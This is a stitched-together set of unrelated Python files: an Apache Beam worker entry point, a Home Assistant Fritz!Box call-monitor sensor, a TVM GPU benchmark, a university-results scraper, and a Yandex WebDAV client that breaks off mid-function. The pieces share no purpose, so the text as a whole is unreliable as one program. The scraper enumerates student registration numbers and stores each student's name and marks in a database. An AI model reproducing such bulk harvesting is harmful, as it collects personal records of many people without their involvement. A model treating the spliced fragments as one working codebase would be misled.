from apache_beam.utils import profiler
# This module is experimental. No backwards-compatibility guarantees.
_LOGGER = logging.getLogger(__name__)
class StatusServer(object):
@classmethod
def get_thread_dump(cls):
lines = []
frames = sys._current_frames() # pylint: disable=protected-access
for t in threading.enumerate():
lines.append('--- Thread #%s name: %s ---\n' % (t.ident, t.name))
lines.append(''.join(traceback.format_stack(frames[t.ident])))
return lines
def start(self, status_http_port=0):
"""Executes the serving loop for the status server.
Args:
status_http_port(int): Binding port for the debug server.
Default is 0 which means any free unsecured port
"""
class StatusHttpHandler(http.server.BaseHTTPRequestHandler):
"""HTTP handler for serving stacktraces of all threads."""
def do_GET(self): # pylint: disable=invalid-name
"""Return all thread stacktraces information for GET request."""
self.send_response(200)
self.send_header('Content-Type', 'text/plain')
self.end_headers()
for line in StatusServer.get_thread_dump():
self.wfile.write(line.encode('utf-8'))
def log_message(self, f, *args):
"""Do not log any messages."""
pass
self.httpd = httpd = http.server.HTTPServer(
('localhost', status_http_port), StatusHttpHandler)
_LOGGER.info('Status HTTP server running at %s:%s', httpd.server_name,
httpd.server_port)
httpd.serve_forever()
def main(unused_argv):
"""Main entry point for SDK Fn Harness."""
if 'LOGGING_API_SERVICE_DESCRIPTOR' in os.environ:
try:
logging_service_descriptor = endpoints_pb2.ApiServiceDescriptor()
text_format.Merge(os.environ['LOGGING_API_SERVICE_DESCRIPTOR'],
logging_service_descriptor)
# Send all logs to the runner.
fn_log_handler = FnApiLogRecordHandler(logging_service_descriptor)
# TODO(BEAM-5468): This should be picked up from pipeline options.
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(fn_log_handler)
_LOGGER.info('Logging handler created.')
except Exception:
_LOGGER.error("Failed to set up logging handler, continuing without.",
exc_info=True)
fn_log_handler = None
else:
fn_log_handler = None
# Start status HTTP server thread.
thread = threading.Thread(name='status_http_server',
target=StatusServer().start)
thread.daemon = True
  thread.setName('status-server-daemon')
thread.start()
if 'PIPELINE_OPTIONS' in os.environ:
sdk_pipeline_options = _parse_pipeline_options(
os.environ['PIPELINE_OPTIONS'])
else:
sdk_pipeline_options = PipelineOptions.from_dictionary({})
if 'SEMI_PERSISTENT_DIRECTORY' in os.environ:
semi_persistent_directory = os.environ['SEMI_PERSISTENT_DIRECTORY']
else:
semi_persistent_directory = None
_LOGGER.info('semi_persistent_directory: %s', semi_persistent_directory)
_worker_id = os.environ.get('WORKER_ID', None)
try:
_load_main_session(semi_persistent_directory)
except Exception: # pylint: disable=broad-except
exception_details = traceback.format_exc()
_LOGGER.error(
'Could not load main session: %s', exception_details, exc_info=True)
try:
_LOGGER.info('Python sdk harness started with pipeline_options: %s',
sdk_pipeline_options.get_all_options(drop_default=True))
service_descriptor = endpoints_pb2.ApiServiceDescriptor()
text_format.Merge(os.environ['CONTROL_API_SERVICE_DESCRIPTOR'],
service_descriptor)
# TODO(robertwb): Support credentials.
assert not service_descriptor.oauth2_client_credentials_grant.url
SdkHarness(
control_address=service_descriptor.url,
worker_id=_worker_id,
state_cache_size=_get_state_cache_size(sdk_pipeline_options),
profiler_factory=profiler.Profile.factory_from_options(
sdk_pipeline_options.view_as(ProfilingOptions))
).run()
_LOGGER.info('Python sdk harness exiting.')
except: # pylint: disable=broad-except
_LOGGER.exception('Python sdk harness failed: ')
raise
finally:
if fn_log_handler:
fn_log_handler.close()
def _parse_pipeline_options(options_json):
options = json.loads(options_json)
# Check the options field first for backward compatibility.
if 'options' in options:
return PipelineOptions.from_dictionary(options.get('options'))
else:
# Remove extra urn part from the key.
portable_option_regex = r'^beam:option:(?P<key>.*):v1$'
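    # e.g. the key "beam:option:runner:v1" becomes "runner" (illustrative key); unmatched keys pass through unchanged.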
return PipelineOptions.from_dictionary({
re.match(portable_option_regex, k).group('key')
if re.match(portable_option_regex, k) else k: v
for k, v in options.items()
})
def _get_state_cache_size(pipeline_options):
"""Defines the upper number of state items to cache.
Note: state_cache_size is an experimental flag and might not be available in
future releases.
Returns:
an int indicating the maximum number of items to cache.
Default is 0 (disabled)
"""
experiments = pipeline_options.view_as(DebugOptions).experiments
experiments = experiments if experiments else []
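  # e.g. an experiment entry "state_cache_size=1000" (illustrative value) yields a cache size of 1000.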
for experiment in experiments:
# There should only be 1 match so returning from the loop
if re.match(r'state_cache_size=', experiment):
return int(
re.match(r'state_cache_size=(?P<state_cache_size>.*)',
experiment).group('state_cache_size'))
return 0
def _load_main_session(semi_persistent_directory):
"""Loads a pickled main session from the path specified."""
if semi_persistent_directory:
session_file = os.path.join(semi_persistent_directory, 'staged',
names.PICKLED_MAIN_SESSION_FILE)
if os.path.isfile(session_file):
pickler.load_session(session_file)
else:
_LOGGER.warning(
'No session file found: %s. Functions defined in __main__ '
'(interactive session) may fail.', session_file)
else:
_LOGGER.warning(
'No semi_persistent_directory found: Functions defined in __main__ '
'(interactive session) may fail.')
if __name__ == '__main__':
main(sys.argv)
|
sensor.py
|
"""Sensor to monitor incoming/outgoing phone calls on a Fritz!Box router."""
import datetime
import logging
import re
import socket
import threading
import time
from fritzconnection.lib.fritzphonebook import FritzPhonebook
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
EVENT_HOMEASSISTANT_STOP,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
_LOGGER = logging.getLogger(__name__)
CONF_PHONEBOOK = "phonebook"
CONF_PREFIXES = "prefixes"
DEFAULT_HOST = "169.254.1.1" # IP valid for all Fritz!Box routers
DEFAULT_NAME = "Phone"
DEFAULT_PORT = 1012
INTERVAL_RECONNECT = 60
VALUE_CALL = "dialing"
VALUE_CONNECT = "talking"
VALUE_DEFAULT = "idle"
VALUE_DISCONNECT = "idle"
VALUE_RING = "ringing"
# Return cached results if phonebook was downloaded less than this time ago.
MIN_TIME_PHONEBOOK_UPDATE = datetime.timedelta(hours=6)
SCAN_INTERVAL = datetime.timedelta(hours=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_HOST, default=DEFAULT_HOST): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
vol.Optional(CONF_PASSWORD, default="admin"): cv.string,
vol.Optional(CONF_USERNAME, default=""): cv.string,
vol.Optional(CONF_PHONEBOOK, default=0): cv.positive_int,
vol.Optional(CONF_PREFIXES, default=[]): vol.All(cv.ensure_list, [cv.string]),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up Fritz!Box call monitor sensor platform."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
# Try to resolve a hostname; if it is already an IP, it will be returned as-is
try:
host = socket.gethostbyname(host)
except socket.error:
_LOGGER.error("Could not resolve hostname %s", host)
return
port = config.get(CONF_PORT)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
phonebook_id = config.get(CONF_PHONEBOOK)
prefixes = config.get(CONF_PREFIXES)
try:
phonebook = FritzBoxPhonebook(
host=host,
port=port,
username=username,
password=password,
phonebook_id=phonebook_id,
prefixes=prefixes,
)
except: # noqa: E722 pylint: disable=bare-except
phonebook = None
_LOGGER.warning("Phonebook with ID %s not found on Fritz!Box", phonebook_id)
sensor = FritzBoxCallSensor(name=name, phonebook=phonebook)
add_entities([sensor])
monitor = FritzBoxCallMonitor(host=host, port=port, sensor=sensor)
monitor.connect()
def _stop_listener(_event):
monitor.stopped.set()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, _stop_listener)
return monitor.sock is not None
class FritzBoxCallSensor(Entity):
"""Implementation of a Fritz!Box call monitor."""
def __init__(self, name, phonebook):
"""Initialize the sensor."""
self._state = VALUE_DEFAULT
self._attributes = {}
self._name = name
self.phonebook = phonebook
def set_state(self, state):
"""Set the state."""
self._state = state
def set_attributes(self, attributes):
"""Set the state attributes."""
self._attributes = attributes
@property
def should_poll(self):
"""Only poll to update phonebook, if defined."""
return self.phonebook is not None
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes."""
return self._attributes
def number_to_name(self, number):
"""Return a name for a given phone number."""
if self.phonebook is None:
return "unknown"
return self.phonebook.get_name(number)
def update(self):
"""Update the phonebook if it is defined."""
if self.phonebook is not None:
self.phonebook.update_phonebook()
class FritzBoxCallMonitor:
"""Event listener to monitor calls on the Fritz!Box."""
def __init__(self, host, port, sensor):
"""Initialize Fritz!Box monitor instance."""
self.host = host
self.port = port
self.sock = None
self._sensor = sensor
self.stopped = threading.Event()
def connect(self):
"""Connect to the Fritz!Box."""
_LOGGER.debug("Setting up socket...")
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(10)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
try:
self.sock.connect((self.host, self.port))
threading.Thread(target=self._listen).start()
except socket.error as err:
self.sock = None
_LOGGER.error(
"Cannot connect to %s on port %s: %s", self.host, self.port, err
)
def _listen(self):
"""Listen to incoming or outgoing calls."""
_LOGGER.debug("Connection established, waiting for response...")
while not self.stopped.isSet():
try:
response = self.sock.recv(2048)
except socket.timeout:
# if no response after 10 seconds, just recv again
continue
response = str(response, "utf-8")
_LOGGER.debug("Received %s", response)
if not response:
# if the response is empty, the connection has been lost.
# try to reconnect
_LOGGER.warning("Connection lost, reconnecting...")
self.sock = None
while self.sock is None:
self.connect()
time.sleep(INTERVAL_RECONNECT)
else:
line = response.split("\n", 1)[0]
self._parse(line)
time.sleep(1)
def _parse(self, line):
"""Parse the call information and set the sensor states."""
line = line.split(";")
df_in = "%d.%m.%y %H:%M:%S"
df_out = "%Y-%m-%dT%H:%M:%S"
isotime = datetime.datetime.strptime(line[0], df_in).strftime(df_out)
if line[1] == "RING":
self._sensor.set_state(VALUE_RING)
att = {
"type": "incoming",
"from": line[3],
"to": line[4],
"device": line[5],
"initiated": isotime,
}
att["from_name"] = self._sensor.number_to_name(att["from"])
self._sensor.set_attributes(att)
elif line[1] == "CALL":
self._sensor.set_state(VALUE_CALL)
att = {
"type": "outgoing",
"from": line[4],
"to": line[5],
"device": line[6],
"initiated": isotime,
}
att["to_name"] = self._sensor.number_to_name(att["to"])
self._sensor.set_attributes(att)
elif line[1] == "CONNECT":
self._sensor.set_state(VALUE_CONNECT)
att = {"with": line[4], "device": line[3], "accepted": isotime}
att["with_name"] = self._sensor.number_to_name(att["with"])
self._sensor.set_attributes(att)
elif line[1] == "DISCONNECT":
self._sensor.set_state(VALUE_DISCONNECT)
att = {"duration": line[3], "closed": isotime}
self._sensor.set_attributes(att)
self._sensor.schedule_update_ha_state()
class FritzBoxPhonebook:
"""This connects to a FritzBox router and downloads its phone book."""
def __init__(self, host, port, username, password, phonebook_id=0, prefixes=None):
"""Initialize the class."""
self.host = host
self.username = username
self.password = password
self.port = port
self.phonebook_id = phonebook_id
self.phonebook_dict = None
self.number_dict = None
self.prefixes = prefixes or []
# Establish a connection to the FRITZ!Box.
self.fph = FritzPhonebook(
address=self.host, user=self.username, password=self.password
)
if self.phonebook_id not in self.fph.list_phonebooks:
raise ValueError("Phonebook with this ID not found.")
self.update_phonebook()
@Throttle(MIN_TIME_PHONEBOOK_UPDATE)
def update_phonebook(self):
"""Update the phone book dictionary."""
self.phonebook_dict = self.fph.get_all_names(self.phonebook_id)
self.number_dict = {
re.sub(r"[^\d\+]", "", nr): name
for name, nrs in self.phonebook_dict.items()
for nr in nrs
}
_LOGGER.info("Fritz!Box phone book successfully updated")
def get_name(self, number):
"""Return a name for a given phone number."""
number = re.sub(r"[^\d\+]", "", str(number))
if self.number_dict is None:
return "unknown"
try:
return self.number_dict[number]
except KeyError:
pass
if self.prefixes:
for prefix in self.prefixes:
try:
return self.number_dict[prefix + number]
except KeyError:
pass
try:
return self.number_dict[prefix + number.lstrip("0")]
except KeyError:
pass
return "unknown"
|
gpu_imagenet_bench.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Benchmark script for ImageNet models on GPU.
see README.md for the usage and results of this script.
"""
import argparse
import threading
import numpy as np
import tvm
from tvm import te
import tvm.contrib.graph_executor as runtime
from tvm import relay
from util import get_network
def benchmark(network, target):
net, params, input_shape, output_shape = get_network(network, batch_size=1)
with tvm.transform.PassContext(opt_level=3):
lib = relay.build(net, target=target, params=params)
# create runtime
dev = tvm.device(str(target), 0)
module = runtime.GraphModule(lib["default"](dev))
data_tvm = tvm.nd.array((np.random.uniform(size=input_shape)).astype(dtype))
module.set_input("data", data_tvm)
# evaluate
ftimer = module.module.time_evaluator("run", dev, number=1, repeat=args.repeat)
    prof_res = np.array(ftimer().results) * 1000  # multiply by 1000 to convert to milliseconds
print(
"%-20s %-19s (%s)" % (network, "%.2f ms" % np.mean(prof_res), "%.2f ms" % np.std(prof_res))
)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--network",
type=str,
choices=[
"resnet-18",
"resnet-34",
"resnet-50",
"vgg-16",
"vgg-19",
"densenet-121",
"inception_v3",
"mobilenet",
"squeezenet_v1.0",
"squeezenet_v1.1",
],
help="The name of neural network",
)
parser.add_argument(
"--device",
type=str,
choices=["amd_apu"],
default="amd_apu",
help="The name of the test device. If your device is not listed in "
"the choices list, pick the most similar one as argument.",
)
parser.add_argument(
"--model",
type=str,
choices=["1080ti", "titanx", "tx2", "gfx900", "v1000"],
default="1080ti",
help="The model of the test device. If your device is not listed in "
"the choices list, pick the most similar one as argument.",
)
parser.add_argument("--repeat", type=int, default=600)
parser.add_argument(
"--target",
type=str,
choices=["cuda", "opencl", "rocm", "nvptx", "metal", "vulkan"],
default="cuda",
help="The tvm compilation target",
)
parser.add_argument("--thread", type=int, default=1, help="The number of threads to be run.")
args = parser.parse_args()
dtype = "float32"
if args.network is None:
networks = ["resnet-50", "mobilenet", "vgg-19", "inception_v3"]
else:
networks = [args.network]
target = tvm.target.Target("%s -device=%s -model=%s" % (args.target, args.device, args.model))
print("--------------------------------------------------")
print("%-20s %-20s" % ("Network Name", "Mean Inference Time (std dev)"))
print("--------------------------------------------------")
for network in networks:
if args.thread == 1:
benchmark(network, target)
else:
threads = list()
for n in range(args.thread):
thread = threading.Thread(
target=benchmark, args=([network, target]), name="thread%d" % n
)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
helpers.py
|
from pymongo import MongoClient
import pymongo
from collections import OrderedDict
from lxml import etree, html
import requests
import urllib2
import threading
NUM_OF_STUDENTS = 150
RESPONSE_COUNT = 0
NUM_OF_COLLEGES = 172
#BRANCH_CODES = ['bt', 'cv', 'ee', 'ec', 'te', 'is', 'cs', 'me']
BRANCH_CODES = ['is']
BASE_URL = 'http://results.vtu.ac.in'
def student_results(college_code='1MV', year='14', branch='IS', regno=45):
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0',
'X-Requested-With': 'XMLHttpRequest',
'Host': 'results.vtu.ac.in',
'Referer': 'http://results.vtu.ac.in/'
}
payload = {
'rid': college_code.upper() + year + branch.upper() + str(regno).zfill(3),
'submit': 'SUBMIT'
}
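    # e.g. college_code='1MV', year='14', branch='IS', regno=45 gives rid '1MV14IS045'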
# xpath selector for subject name
sub_xpath = '/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[2]/tr[{}]/td[{}]/i/text()'
# xpath selector for subject external marks, internal marks and total marks
sub_xpath2 = '/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[2]/tr[{}]/td[{}]/text()'
# xpath selector for subject result
sub_xpath3 = '/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[2]/tr[{}]/td[{}]/b/text()'
response = requests.post(BASE_URL + '/vitavi.php', payload, headers=headers)
tree = html.fromstring(response.content)
print ("\n---------------------------------------\n")
print ("Response code : ")
print (response.status_code)
# student details
student_name_usn = tree.xpath('/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/b/text()')
total_marks = tree.xpath('/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[3]/tr/td[4]/text()')
semester = tree.xpath('/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[1]/tr/td[2]/b/text()')
result = tree.xpath('/html/body/table/tbody/tr[3]/td[2]/table/tbody/tr[3]/td/table/tbody/tr[2]/td[1]/table[2]/tbody/tr/td/table/tbody/tr[2]/td/table[1]/tr/td[4]/b/text()')
# subject details
sub1 = tree.xpath(sub_xpath.format('2', '1'))
sub1_external = tree.xpath(sub_xpath2.format('2', '2'))
sub1_internal = tree.xpath(sub_xpath2.format('2', '3'))
sub1_total = tree.xpath(sub_xpath2.format('2', '4'))
sub1_result = tree.xpath(sub_xpath3.format('2', '5'))
sub2 = tree.xpath(sub_xpath.format('3', '1'))
sub2_external = tree.xpath(sub_xpath2.format('3', '2'))
sub2_internal = tree.xpath(sub_xpath2.format('3', '3'))
sub2_total = tree.xpath(sub_xpath2.format('3', '4'))
sub2_result = tree.xpath(sub_xpath3.format('3', '5'))
sub3 = tree.xpath(sub_xpath.format('4', '1'))
sub3_external = tree.xpath(sub_xpath2.format('4', '2'))
sub3_internal = tree.xpath(sub_xpath2.format('4', '3'))
sub3_total = tree.xpath(sub_xpath2.format('4', '4'))
sub3_result = tree.xpath(sub_xpath3.format('4', '5'))
sub4 = tree.xpath(sub_xpath.format('5', '1'))
sub4_external = tree.xpath(sub_xpath2.format('5', '2'))
sub4_internal = tree.xpath(sub_xpath2.format('5', '3'))
sub4_total = tree.xpath(sub_xpath2.format('5', '4'))
sub4_result = tree.xpath(sub_xpath3.format('5', '5'))
sub5 = tree.xpath(sub_xpath.format('6', '1'))
sub5_external = tree.xpath(sub_xpath2.format('6', '2'))
sub5_internal = tree.xpath(sub_xpath2.format('6', '3'))
sub5_total = tree.xpath(sub_xpath2.format('6', '4'))
sub5_result = tree.xpath(sub_xpath3.format('6', '5'))
sub6 = tree.xpath(sub_xpath.format('7', '1'))
sub6_external = tree.xpath(sub_xpath2.format('7', '2'))
sub6_internal = tree.xpath(sub_xpath2.format('7', '3'))
sub6_total = tree.xpath(sub_xpath2.format('7', '4'))
sub6_result = tree.xpath(sub_xpath3.format('7', '5'))
sub7 = tree.xpath(sub_xpath.format('8', '1'))
sub7_external = tree.xpath(sub_xpath2.format('8', '2'))
sub7_internal = tree.xpath(sub_xpath2.format('8', '3'))
sub7_total = tree.xpath(sub_xpath2.format('8', '4'))
sub7_result = tree.xpath(sub_xpath3.format('8', '5'))
sub8 = tree.xpath(sub_xpath.format('9', '1'))
sub8_external = tree.xpath(sub_xpath2.format('9', '2'))
sub8_internal = tree.xpath(sub_xpath2.format('9', '3'))
sub8_total = tree.xpath(sub_xpath2.format('9', '4'))
sub8_result = tree.xpath(sub_xpath3.format('9', '5'))
try:
student_name_usn = student_name_usn[0].split('(')
result = result[0].split()
total_marks = total_marks[0].strip().replace(' ','')
if len(result) == 5:
result = result[1] + ' ' + result[2] + ' ' + result[3] + ' ' + result[4]
elif len(result) == 3:
result = result[1] + ' ' + result[2]
elif len(result) == 2:
result = result[1]
student = OrderedDict([
('name', student_name_usn[0].strip()),
('usn', student_name_usn[1].strip().replace(')', '')),
('semester', semester[0]),
('result', result),
('total_marks', total_marks),
('college_code', college_code),
('year', year),
('branch', branch),
('subject_marks', [
OrderedDict([
('subject', sub1[0]),
('external', sub1_external[0]),
('internal', sub1_internal[0]),
('total', sub1_total[0]),
('result', sub1_result[0])
]),
OrderedDict([
('subject', sub2[0]),
('external', sub2_external[0]),
('internal', sub2_internal[0]),
('total', sub2_total[0]),
('result', sub2_result[0])
]),
OrderedDict([
('subject', sub3[0]),
('external', sub3_external[0]),
('internal', sub3_internal[0]),
('total', sub3_total[0]),
('result', sub3_result[0])
]),
OrderedDict([
('subject', sub4[0]),
('external', sub4_external[0]),
('internal', sub4_internal[0]),
('total', sub4_total[0]),
('result', sub4_result[0])
]),
OrderedDict([
('subject', sub5[0]),
('external', sub5_external[0]),
('internal', sub5_internal[0]),
('total', sub5_total[0]),
('result', sub5_result[0])
]),
OrderedDict([
('subject', sub6[0]),
('external', sub6_external[0]),
('internal', sub6_internal[0]),
('total', sub6_total[0]),
('result', sub6_result[0])
]),
OrderedDict([
('subject', sub7[0]),
('external', sub7_external[0]),
('internal', sub7_internal[0]),
('total', sub7_total[0]),
('result', sub7_result[0])
]),
OrderedDict([
('subject', sub8[0]),
('external', sub8_external[0]),
('internal', sub8_internal[0]),
('total', sub8_total[0]),
('result', sub8_result[0])
]),
])
])
except IndexError as e:
#print("USN doesn't exist\n")
student = None
return student
def insert_section_results(college_code='1MV', year='14', branch='IS'):
client = MongoClient(document_class=OrderedDict)
db = client.results
db.students.ensure_index('usn', unique=True)
NONE_STUDENT_LIMIT = 20
NONE_STUDENT_COUNT = 0
STUDENT_COUNT = 0
regno = 1
while True:
if (STUDENT_COUNT >= 20):
STUDENT_COUNT=0
STUDENT_COUNT = STUDENT_COUNT + 1
usn = college_code.upper()+year.upper()+branch.upper()+str(regno).zfill(3).upper()
result = student_results(college_code=college_code, year=year, branch=branch, regno=regno)
print("Tried inserting : ")
print (usn)
if (result != None):
try:
db.students.insert_one(result)
print ("Inserted : ")
print (usn)
except :
pass
print ("\n---------------------------------------\n")
else:
NONE_STUDENT_COUNT = NONE_STUDENT_COUNT + 1
regno = regno +1
if (NONE_STUDENT_COUNT == NONE_STUDENT_LIMIT or regno >=150):
break
def insert_college_results(college_code, year='14'):
for branch in BRANCH_CODES:
insert_section_results(college_code=college_code, year=year, branch=branch)
def insert_region_results(COLLEGE_CODES):
#COLLEGE_CODES = list(COLLEGE_CODES)
for college_code in COLLEGE_CODES:
insert_college_results(college_code=college_code, year='14')
def insert_region_results_multithreaded(COLLEGE_CODES, num_threads=5):
    cpt = NUM_OF_COLLEGES // num_threads  # colleges per thread (integer division so slice indices stay ints)
threads = []
for i in range(num_threads):
        t = threading.Thread(target=insert_region_results, args=(COLLEGE_CODES[i*cpt:(i+1)*cpt],))
threads.append(t)
t.start()
t = threading.Thread(target=insert_region_results, args=(COLLEGE_CODES[(i+1)*cpt:],))
threads.append(t)
t.start()
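
# --- Illustrative usage sketch (editor's addition, not part of the original script) ---
# Shows how the helpers above would typically be driven. It assumes COLLEGE_CODES
# (a list of college codes) and NUM_OF_COLLEGES are defined near the top of this module,
# since insert_region_results_multithreaded() already relies on them. The function is
# never called here, so importing the module stays side-effect free.
def _example_scrape_run():
    # scrape one college, branch by branch, on the current thread
    insert_college_results(college_code='1MV', year='14')
    # or scrape the whole region using 5 worker threads
    insert_region_results_multithreaded(COLLEGE_CODES, num_threads=5)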
|
yandexwebdav.py
|
#!/usr/bin/python
# coding=utf-8
import os
import sys
import threading
import logging
import base64
import xml.dom.minidom
from six.moves import queue
from six.moves import http_client
from six import u, b, PY3
if PY3:
from urllib.parse import unquote, quote
else:
from urllib import unquote, quote
logger = logging.getLogger("yandexwebdav.py")
TRYINGS = 3
def _encode_utf8(txt):
if not PY3:
if type(txt) == unicode:
return txt.encode("utf-8")
return txt
def _decode_utf8(txt):
if PY3:
if type(txt) is str:
return txt
return txt.decode("utf-8")
def _(path):
"""
Normalize path to unicode
:param path: path
    :return: normalized path
>>> _(None)
u''
>>> _(u("test1"))
u'test1'
>>> _("test2")
u'test2'
"""
if path is None:
return u("")
if not PY3:
if type(path) == unicode:
return path
try:
return _decode_utf8(path)
except UnicodeDecodeError:
pass
return path
def remote(href):
"""
Normalize remote href
:param href: remote path
    :return: normalized href
>>> remote("/test/hello.txt")
u'/test/hello.txt'
>>> remote("test/hello.txt")
u'/test/hello.txt'
>>> remote("test\hello.txt")
u'/test/hello.txt'
>>> remote(None)
u'/'
"""
href = _(href)
href = os.path.join(u("/"), href)
if os.sep == "\\":
href = href.replace("\\", "/")
return href
class RemoteObject(object):
def __init__(self, dom, config, root):
self._dom = dom
self._config = config
self.root = root
href = self._getEl("href")
href = _encode_utf8(href)
self.href = _decode_utf8(unquote(href))
self.length = self._getEl("getcontentlength")
self.name = self._getEl("displayname")
self.creationdate = self._getEl("creationdate")
def _getEl(self, name):
els = self._dom.getElementsByTagNameNS("DAV:", name)
return els[0].firstChild.nodeValue if len(els) > 0 else ""
def isFolder(self):
els = self._dom.getElementsByTagNameNS("DAV:", "collection")
return len(els) > 0
def download(self):
return self._config.download(self.href)
def downloadTo(self, path):
return self._config.downloadTo(self.href, path)
def delete(self):
return self._config.delete(self.href)
def list(self):
if self.isFolder() and self.href != self.root:
return self._config.list(os.path.join(self.root, self.href))
return []
def __str__(self):
return self.href
def __unicode__(self):
return self.href
qWork = queue.Queue()
def __call():
while True:
try:
name, func, args = qWork.get()
func(*args)
qWork.task_done()
except queue.Empty:
pass
except Exception:
e = sys.exc_info()[1]
print("Exception: {0} {1}".format(name, e))
threadsContainer = []
def apply_async(name, func, params_list, limit=5):
for params in params_list:
if type(params) is list or type(params) is tuple:
item = (name, func, params)
else:
item = (name, func, [params, ])
res = qWork.put_nowait(item)
if len(threadsContainer) > 0:
return
for i in range(limit):
t = threading.Thread(target=__call)
t.daemon = True
threadsContainer.append(t)
for th in threadsContainer:
th.start()
class ConnectionException(Exception):
"""docstring for NotAuthException"""
def __init__(self, code, msg=""):
        strError = _("Not authorized, status code: {0}\n{1}").format(code, msg)
self.code = code
super(ConnectionException, self).__init__(strError)
def checkResponse(response, msg=""):
if response.status not in [200, 201, 207]:
raise ConnectionException(response.status, msg)
class Config(object):
def __init__(self, opts):
"""
Constructor
:param opts: dictionary of property
:return: self
"""
self.user = _encode_utf8(opts.get("user", ""))
self.password = _encode_utf8(opts.get("password", ""))
self.host = _encode_utf8(opts.get("host", "webdav.yandex.ru"))
self.options = opts
self.limit = opts.get("limit", 4)
def getHeaders(self):
"""
Get common headers
:return:
"""
basicauth = base64.encodestring(b(self.user + ':' + self.password)).strip()
return {
"Depth": "1",
"Authorization": 'Basic ' + _decode_utf8(basicauth),
"Accept": "*/*"
}
def getConnection(self):
"""
Get connection
:return: connection http_client.HTTPSConnection
"""
return http_client.HTTPSConnection(self.host)
def list(self, href):
"""
        List files and directories on the remote server
        :param href: remote folder
        :return: tuple (folders, files) of dicts keyed by href; (None, None) if the folder doesn't exist
"""
for iTry in range(TRYINGS):
logger.info(u("list(%s): %s") % (iTry, href))
folders = None
files = None
try:
href = os.path.join(u("/"), _(href))
conn = self.getConnection()
href = _encode_utf8(href)
href = quote(href)
conn.request("PROPFIND",href, u(""), self.getHeaders())
response = conn.getresponse()
checkResponse(response)
data = response.read()
if data == b('list: folder was not found'):
return folders, files
elif data == b('You are not authorized to see this!'):
return folders, files
else:
try:
dom = xml.dom.minidom.parseString(data)
responces = dom.getElementsByTagNameNS("DAV:", "response")
folders = {}
files = {}
for dom in responces:
response = RemoteObject(dom, self, href)
if response.href != href:
if response.isFolder():
folders[response.href] = response
else:
files[response.href] = response
except xml.parsers.expat.ExpatError:
e = sys.exc_info()[1]
logger.exception(e)
return folders, files
except ConnectionException:
raise
except Exception:
e = sys.exc_info()[1]
logger.exception(e)
return folders, files
def sync(self, localpath, href, exclude=None, block=True):
"""
Sync local and remote folders
:param localpath: local folder
:param href: remote folder
        :param exclude: callback(localFolderPath, remoteFolderPath) deciding whether a sub-folder should be synced
        :param block: when True, wait for the worker queue to drain before returning
        :return: None
"""
logger.info(u("sync: %s %s") % (localpath, href))
try:
localpath = _(localpath)
href = remote(href)
localRoot, localFolders, localFiles = next(os.walk(localpath))
remoteFolders, remoteFiles = self.list(href)
if remoteFiles is None or remoteFolders is None:
remoteFiles = {}
remoteFolders = {}
self.mkdir(href)
def norm(folder):
path = os.path.join(href, _(folder))
                if not path.endswith(u("/")):
path += u("/")
return path
foldersToCreate = filter(
lambda folderPath: folderPath not in remoteFolders,
map(norm, localFolders)
)
apply_async("mkdir", lambda path: self.mkdir(path), foldersToCreate, self.limit)
filesToSync = filter(
lambda lFile: os.path.join(href, _(lFile)) not in remoteFiles,
localFiles
)
fileArgs = [(os.path.join(localpath, f), os.path.join(href, f))
for f in filesToSync]
apply_async("upload", lambda s, t: self.upload(s, t), fileArgs, self.limit)
for folder in localFolders:
localFolderPath = os.path.join(localpath, folder)
remoteFolderPath = os.path.join(href, folder)
if exclude:
bSync = exclude(localFolderPath, remoteFolderPath)
else:
bSync = True
if bSync:
apply_async(
"sync",
lambda localpath, href: self.sync(localpath, href, exclude, False),
[(localFolderPath, remoteFolderPath), ]
)
except ConnectionException:
raise
except Exception:
